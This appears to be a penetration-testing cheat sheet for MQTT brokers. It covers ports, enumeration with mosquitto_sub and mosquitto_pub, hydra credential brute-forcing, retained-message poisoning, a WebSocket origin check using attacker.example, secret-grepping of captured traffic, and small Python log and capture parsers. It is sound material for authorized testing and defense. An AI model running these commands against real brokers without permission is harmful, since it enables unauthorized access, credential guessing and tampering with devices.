MQTT

Default Ports: 1883 (MQTT), 8883 (MQTT over TLS), 9001 (WebSocket)

MQTT is a lightweight publish/subscribe protocol used in IoT, telemetry, mobile apps, and microservices. In pentests, MQTT often exposes anonymous access, broad topic permissions, retained messages, and sensitive device or command traffic.

Connect

Using mosquitto_sub

mosquitto_sub validates read access to topics.

mosquitto_sub -h target.com -p 1883 -t 'test/topic'
mosquitto_sub -h target.com -p 1883 -t '#'
mosquitto_sub -h target.com -p 1883 -u username -P password -t '#'
mosquitto_sub -h target.com -p 1883 -v -t '#'

Using mosquitto_pub

mosquitto_pub validates write access with controlled messages.

mosquitto_pub -h target.com -p 1883 -t 'test/topic' -m 'hello'
mosquitto_pub -h target.com -p 1883 -u username -P password -t 'test/topic' -m 'hello'
mosquitto_pub -h target.com -p 1883 -t 'test/topic' -m 'retained-test' -r

Using TLS

TLS testing checks secure transport and certificate behavior.

mosquitto_sub -h target.com -p 8883 --capath /etc/ssl/certs -t '#'
mosquitto_sub -h target.com -p 8883 --insecure -t '#'
openssl s_client -connect target.com:8883 -showcerts

Using WebSocket MQTT

MQTT over WebSocket is often exposed to browser dashboards.

curl -i http://target.com:9001/mqtt
curl -i http://target.com:9001/ws

Recon

Service Detection with Nmap

Scan MQTT, TLS, WebSocket, and management ports.

nmap -p 1883,8883,9001 -sV target.com
nmap -p 8883 --script ssl-cert,ssl-enum-ciphers target.com
nmap -p 1883,8883 --open -sV 192.168.1.0/24

Broker Identification

Broker identity often comes from $SYS, TLS certificates, or management consoles.

openssl s_client -connect target.com:8883 -showcerts </dev/null
nmap -p 80,443,8080,8083,8084,18083,9001 -sV target.com
mosquitto_sub -h target.com -p 1883 -t '$SYS/#' -C 5 -W 5

Common Broker Ports

Scan vendor defaults when MQTT is suspected.

# Mosquitto: 1883, 8883
# EMQX: 1883, 8883, 8083, 8084, 18083
# HiveMQ: 1883, 8883, 8080
# VerneMQ: 1883, 8883, 8888

Enumeration

Anonymous Access

Anonymous subscribe or publish is the most common MQTT finding.

mosquitto_sub -h target.com -p 1883 -t '$SYS/#' -v -W 10
mosquitto_sub -h target.com -p 1883 -t '#' -v -W 10
mosquitto_pub -h target.com -p 1883 -t 'pentest/check' -m 'anonymous-publish-test'

System Topics

$SYS topics may expose broker version, uptime, and client statistics.

mosquitto_sub -h target.com -p 1883 -t '$SYS/#' -v
mosquitto_sub -h target.com -p 1883 -u username -P password -t '$SYS/#' -v

Topic Discovery

MQTT has no standard way to list topics, so topic structure is inferred from wildcard subscriptions.

mosquitto_sub -h target.com -p 1883 -t '#' -v -W 30
mosquitto_sub -h target.com -p 1883 -t '+/+/+' -v -W 30

Retained Messages

Retained messages can expose the latest device state or commands.

mosquitto_sub -h target.com -p 1883 -t '#' -v --retained-only -W 10

ACL Enumeration

Compare topics across accounts to find overbroad permissions.

mosquitto_sub -h target.com -p 1883 -u device1 -P password -t '#' -v -W 10
mosquitto_pub -h target.com -p 1883 -u device1 -P password -t 'admin/command' -m 'test'

Attack Vectors

Anonymous Subscribe

Anonymous read access can expose telemetry and command topics.

mosquitto_sub -h target.com -p 1883 -t '#' -v

Anonymous Publish

Anonymous write access may alter device or application behavior.

mosquitto_pub -h target.com -p 1883 -t 'test/topic' -m 'pentest'

Wildcard Abuse

Broad wildcards can bypass weak topic design.

mosquitto_sub -h target.com -p 1883 -t '#' -v
mosquitto_sub -h target.com -p 1883 -t '+/command/#' -v

Weak Credentials

Device credentials are often reused or predictable.

hydra -L users.txt -P passwords.txt -s 1883 target.com mqtt
mosquitto_sub -h target.com -p 1883 -u username -P password -t '#'

Retained Message Poisoning

Retained publishes can leave persistent malicious or misleading values.

mosquitto_pub -h target.com -p 1883 -t 'test/topic' -m 'retained-pentest' -r
mosquitto_pub -h target.com -p 1883 -t 'test/topic' -n -r

WebSocket Exposure

Browser-accessible MQTT may expose tokens or weak CORS behavior.

curl -i -H 'Origin: https://attacker.example' http://target.com:9001/mqtt
rg -n 'mqtt|wss://|ws://|username|password|token' .

Post-Exploitation

Topic Mapping

Save observed topics and group them by device, tenant, or command path.

mosquitto_sub -h target.com -p 1883 -t '#' -v -W 60 > mqtt-topics.txt
cut -d' ' -f1 mqtt-topics.txt | sort -u

Sensitive Data Review

Search captured messages for secrets and identifiers.

grep -Ei 'password|secret|token|apikey|authorization|session|credential' mqtt-topics.txt
grep -Ei 'command|admin|config|ota|firmware|debug' mqtt-topics.txt
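The Topic Mapping and Sensitive Data Review steps above, as an added Python example (not code from the original page): it parses a `mosquitto_sub -v` capture, groups topics by device or tenant prefix, and applies the same keyword groups as the two grep passes. The sample capture is constructed.

```python
"""Group topics captured with `mosquitto_sub -v` and flag sensitive ones.

Added example, not part of the original page. It assumes the capture was
written by `mosquitto_sub -t '#' -v > mqtt-topics.txt`: one message per
line as `<topic> <payload>`, where the payload may itself contain spaces.
"""
import re
from collections import defaultdict

# Keyword groups mirror the two grep passes above.
SECRET_RE = re.compile(r"password|secret|token|apikey|authorization|session|credential", re.I)
COMMAND_RE = re.compile(r"command|admin|config|ota|firmware|debug", re.I)

# Constructed sample capture; not output from a real broker.
SAMPLE_CAPTURE = """\
home/device1/telemetry {"temp": 21.5}
home/device1/command reboot
tenant-a/gateway/config {"wifi_password": "hunter2"}
$SYS/broker/version mosquitto version 2.0.18
home/device2/telemetry {"temp": 19.0}
"""

def parse_capture(text):
    """Return (topic, payload) pairs; mosquitto_sub -v separates them with one space."""
    pairs = []
    for line in text.splitlines():
        if line.strip():
            topic, _, payload = line.partition(" ")
            pairs.append((topic, payload))
    return pairs

def group_by_prefix(pairs, depth=2):
    """Group 'a/b/c' under 'a/b' (depth=2): the device/tenant level in most schemes."""
    groups = defaultdict(set)
    for topic, _ in pairs:
        groups["/".join(topic.split("/")[:depth])].add(topic)
    return {prefix: sorted(topics) for prefix, topics in groups.items()}

def flag_sensitive(pairs):
    """Return (topic, kinds) for messages whose topic or payload hits a keyword group."""
    findings = []
    for topic, payload in pairs:
        text = f"{topic} {payload}"
        kinds = [k for k, rx in (("secret", SECRET_RE), ("command", COMMAND_RE)) if rx.search(text)]
        if kinds:
            findings.append((topic, kinds))
    return findings
```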

Logging Check

Generate controlled auth failures and publish attempts, then confirm they appear in the broker logs.

mosquitto_sub -h target.com -p 1883 -u invalid -P invalid -t '#' -W 3
mosquitto_pub -h target.com -p 1883 -t 'pentest/log-check' -m 'test'
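The broker-side half of this check, as an added Python example (not from the original page): it reads log lines in the style of Mosquitto's default format, counts rejected connects per source address, and lists clients that connected without a username. The log lines are constructed, and the rejection line is attributed to the preceding connection line since Mosquitto does not repeat the address there.

```python
"""Check broker logs for the controlled auth failures and anonymous connects above.

Added example, not part of the original page. Sample lines are constructed in the
style of Mosquitto's default log format. The `<unknown>` rejection line carries no
address, so it is attributed to the most recent `New connection from` line, which
assumes the broker logs connections sequentially.
"""
import re
from collections import Counter

NEW_CONN_RE = re.compile(r"^\d+: New connection from ([\d.]+):\d+ on port \d+")
CONNECTED_RE = re.compile(r"^\d+: New client connected from ([\d.]+):\d+ as (\S+) \((.*)\)")
NOT_AUTH_RE = re.compile(r"^\d+: Client <unknown> disconnected, not authorised")

SAMPLE_LOG = """\
1700000000: New connection from 10.0.0.5:51234 on port 1883.
1700000000: New client connected from 10.0.0.5:51234 as mosq-abc123 (p2, c1, k60).
1700000001: New connection from 10.0.0.9:40001 on port 1883.
1700000001: Client <unknown> disconnected, not authorised.
1700000002: New connection from 10.0.0.9:40002 on port 1883.
1700000002: Client <unknown> disconnected, not authorised.
1700000003: New connection from 10.0.0.7:40003 on port 1883.
1700000003: New client connected from 10.0.0.7:40003 as dev1 (p2, c1, k60, u'device1').
"""

def analyse_log(text):
    """Return (rejected connects per source IP, anonymous connects as (ip, client_id))."""
    failures = Counter()
    anonymous = []
    last_ip = None
    for line in text.splitlines():
        if m := NEW_CONN_RE.match(line):
            last_ip = m.group(1)
        elif m := CONNECTED_RE.match(line):
            # Mosquitto appends u'<username>' to the flags only when a username was sent.
            if "u'" not in m.group(3):
                anonymous.append((m.group(1), m.group(2)))
        elif NOT_AUTH_RE.match(line) and last_ip:
            failures[last_ip] += 1
    return failures, anonymous

def suspicious_sources(failures, threshold=2):
    """Source IPs with at least `threshold` rejections, e.g. the hydra run from the Weak Credentials section."""
    return sorted(ip for ip, n in failures.items() if n >= threshold)
```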

Useful Tools

Tool            Purpose
mosquitto_sub   Subscribe and enumerate topics
mosquitto_pub   Publish test messages
nmap            Port scanning
openssl         TLS review
hydra           Credential testing
tcpdump         Traffic capture
MQTT Explorer   GUI topic browsing

Security Misconfigurations

Misconfiguration              Risk
Anonymous subscribe           Data exposure
Anonymous publish             Command injection or data tampering
Broad wildcard ACLs           Cross-tenant or cross-device access
Retained sensitive messages   Persistent data leakage
Weak device credentials       Broker compromise
Plaintext MQTT                Credential and message capture
WebSocket MQTT exposed        Browser-based abuse